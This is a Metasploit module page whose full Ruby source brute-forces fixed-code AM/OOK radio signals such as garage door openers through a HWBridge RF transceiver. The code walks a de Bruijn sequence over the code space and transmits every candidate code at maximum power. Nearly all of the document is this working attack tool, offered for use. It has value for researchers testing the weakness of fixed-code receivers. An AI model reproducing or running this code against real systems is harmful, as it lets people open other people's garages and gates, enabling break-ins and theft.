
Brute Force AM/OOK (ie: Garage Doors)

🗓️ 20 Mar 2017 22:36:16 — Reported by Craig Smith — Type:
metasploit

Brute-forces AM/OOK (on-off keying) codes through a HWBridge RF transceiver by transmitting raw binary signals. It is a port of the rfpwnon tool by Corey Harding.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

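class MetasploitModule < Msf::Post
  include Msf::Post::Hardware::RFTransceiver::RFTransceiver

  # Post module for HWBridge RF transceivers that brute-forces AM/OOK (or raw
  # binary) fixed codes by walking a de Bruijn sequence over the code alphabet.
  # Port of rfpwnon by Corey Harding.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Brute Force AM/OOK (ie: Garage Doors)',
        'Description' => %q{
          Post Module for HWBridge RFTranscievers.  Brute forces AM OOK or raw
          binary signals.  This is a port of the rfpwnon tool by Corey Harding.
          (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)
        },
        'License' => MSF_LICENSE,
        'Author' => ['Craig Smith'],
        'Platform' => ['hardware'],
        'SessionTypes' => ['hwbridge']
      )
    )
    register_options([
      OptInt.new('FREQ', [true, 'Frequency to transmit on']),
      OptInt.new('BAUD', [false, 'Baud rate to use', 2000]),
      OptInt.new('BINLENGTH', [false, 'Binary Length of signal to brute force', 8]),
      OptInt.new('REPEAT', [false, 'Number of times to repeat the signal', 5]),
      OptString.new('PPAD', [false, 'Specify your own binary padding before the brute forced binary', nil]),
      OptString.new('TPAD', [false, 'Specify your own binary padding after the brute forced binary', nil]),
      OptBool.new('RAW', [false, 'When set, disables PWM encoding. BINLENGTH must be -1', false]),
      OptBool.new('TRI', [false, 'When set, brute foces a trinary signal.', false]),
      OptBool.new('EXTRAVERBOSE', [false, 'More verbose', false]),
      OptInt.new('INDEX', [false, 'USB Index to use', 0]),
      OptInt.new('DELAY', [false, 'Delay in milliseconds between transmissions', 500])
    ])
    # Binary PWM symbol table (4 chips per symbol). run() swaps in the 8-chip
    # trinary table when TRI is set; @twopwm only exists in that mode.
    @zeropwm = '1110'
    @onepwm = '1000'
    @twopwm = nil
    @brutechar = '01'
  end

  # Packs a chip string into bytes, MSB first.
  #
  # A trailing partial byte is zero-padded on the RIGHT so the last chips land
  # in the high bits; right-aligning them (plain to_i(2)) would shift the tail
  # of the waveform by up to seven chip periods.
  #
  # @param bits [String] string of '0'/'1' characters
  # @return [Array<String>] one single-byte String per output byte
  def pack_bits(bits)
    bits.scan(/.{1,8}/).map { |byte| byte.ljust(8, '0').to_i(2).chr }
  end

  # PWM-encodes a symbol string using the active symbol table and packs it
  # into bytes.
  #
  # @param key [String] binary ('0'/'1') or trinary ('0'/'1'/'2') symbols
  # @return [Array<String>] packed bytes, see #pack_bits
  # @raise [ArgumentError] on a symbol the active table cannot encode (e.g. '2'
  #   without TRI), instead of silently emitting a bogus chip
  def convert_ook(key)
    table = { '0' => @zeropwm, '1' => @onepwm, '2' => @twopwm }
    chips = key.each_char.map do |symbol|
      encoded = table[symbol]
      raise ArgumentError, "cannot PWM-encode symbol #{symbol.inspect} in #{key.inspect}" if encoded.nil?

      encoded
    end
    pack_bits(chips.join)
  end

  # @param pad [String, nil] a PPAD/TPAD value
  # @return [Boolean] true when pad is unset or every character is in @brutechar
  def valid_symbols?(pad)
    pad.nil? || pad.each_char.all? { |c| @brutechar.include?(c) }
  end

  # Builds a de Bruijn sequence B(k, n) as a string of digit characters.
  #
  # @param k [Integer] alphabet size (2 for binary, 3 for trinary)
  # @param n [Integer] subsequence length (BINLENGTH)
  # @return [String] the sequence, k**n characters long for n >= 1
  def debruijn_bytes(k, n)
    @a = [0]
    @sequence = []
    debruijn(1, 1, k, n)
    @sequence.join
  end

  # Recursive step of the standard de Bruijn construction; working state is
  # kept in @a / @sequence, which debruijn_bytes resets before each call.
  #
  # @param t [Integer] current position in @a
  # @param p [Integer] current period
  # @param k [Integer] alphabet size
  # @param n [Integer] subsequence length
  def debruijn(t, p, k, n)
    if t > n
      1.upto(p) { |j| @sequence << @a[j] } if n % p == 0
    else
      @a[t] = @a[t - p]
      debruijn(t + 1, p, k, n)
      (@a[t - p] + 1).upto(k - 1) do |j|
        @a[t] = j
        debruijn(t + 1, t, k, n)
      end
    end
  end

  # Configures the transceiver and transmits the brute-force sequence.
  #
  # With REPEAT >= 2 or any padding set, the sequence is sent one BINLENGTH
  # window at a time, sliding by one symbol; otherwise it is sent in large
  # windows (512 symbols binary, 128 trinary) that overlap by BINLENGTH.
  def run
    unless is_rf?
      print_error('Not an RF Transceiver')
      return
    end
    unless set_index(datastore['INDEX'])
      print_error("Couldn't set usb index to #{datastore['INDEX']}")
      return
    end

    binlength = datastore['BINLENGTH']
    # NOTE(review): the RAW option text says BINLENGTH must be -1, but
    # debruijn_bytes(k, -1) yields an empty sequence and the tail slice is nil,
    # so that path raised TypeError as originally written; what raw mode was
    # meant to transmit could not be determined from this file. Fail clearly.
    if binlength < 1
      print_error('BINLENGTH must be a positive integer')
      return
    end

    if datastore['TRI']
      @zeropwm = '10001000'
      @onepwm = '11101110'
      @twopwm = '10001110'
      @brutechar = '012'
    end

    # PPAD/TPAD are operator-supplied symbol strings; reject anything outside
    # the active alphabet up front rather than encoding garbage on air.
    bad_pad = %w[PPAD TPAD].find { |opt| !valid_symbols?(datastore[opt]) }
    if bad_pad
      print_error("#{bad_pad} may only contain the characters: #{@brutechar.chars.join(' ')}")
      return
    end

    set_modulation('ASK/OOK')
    set_freq(datastore['FREQ'])
    set_sync_mode(0)
    set_baud(datastore['BAUD'])
    # Full output power on an arbitrary operator-chosen frequency: confirm you
    # are authorized to transmit on FREQ before running this.
    max_power

    print_status('Generating de bruijn sequence...')
    seq = debruijn_bytes(@brutechar.length, binlength)
    # Append the first BINLENGTH-1 symbols so windows that wrap around the end
    # of the cyclic sequence are transmitted too.
    brutepacket = seq + seq[0, binlength - 1]

    print_status("Brute forcing frequency: #{datastore['FREQ']}")
    print_status("Padding before binary: #{datastore['PPAD']}") if datastore['PPAD']
    print_status("Padding after binary: #{datastore['TPAD']}") if datastore['TPAD']
    print_status("De Bruijin Sequence: #{brutepacket}") if datastore['EXTRAVERBOSE']

    big_window = datastore['TRI'] ? 128 : 512
    chunked = datastore['REPEAT'] >= 2 || datastore['PPAD'] || datastore['TPAD']
    endy = chunked ? binlength : big_window
    advance = chunked ? 1 : big_window - binlength
    # A non-positive step would never move past the first window.
    if advance <= 0
      print_error("BINLENGTH must be smaller than #{big_window} unless REPEAT >= 2 or padding is set")
      return
    end

    repeat = datastore['REPEAT']
    delay_ms = datastore['DELAY']
    startn = 0
    while startn < brutepacket.length
      repeat.times do
        chunk = brutepacket[startn..endy - 1]
        # Windows at the tail are shorter than a full code; skip them.
        next if chunk.length < binlength

        chunk = datastore['PPAD'] + chunk if datastore['PPAD']
        chunk += datastore['TPAD'] if datastore['TPAD']
        key_packed = datastore['RAW'] ? pack_bits(chunk) : convert_ook(chunk)

        print_status('Transmitting...')
        set_flen(key_packed.length)
        rfxmit(key_packed.join)
        print_status('Binary before PWM encoding:')
        print_status(chunk)
        print_status('Binary after PWM encoding:')
        # 'B*' keeps leading zero bits, which a hex->Integer->to_s(2) round trip drops.
        print_status(key_packed.join.unpack('B*')[0])
        # Float division: DELAY is in milliseconds, and integer division made
        # the default 500 ms a 0 s sleep.
        sleep(delay_ms / 1000.0) if delay_ms > 0
      end
      startn += advance
      endy += advance
    end
    print_status('Done')
    set_mode('IDLE')
  end
end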

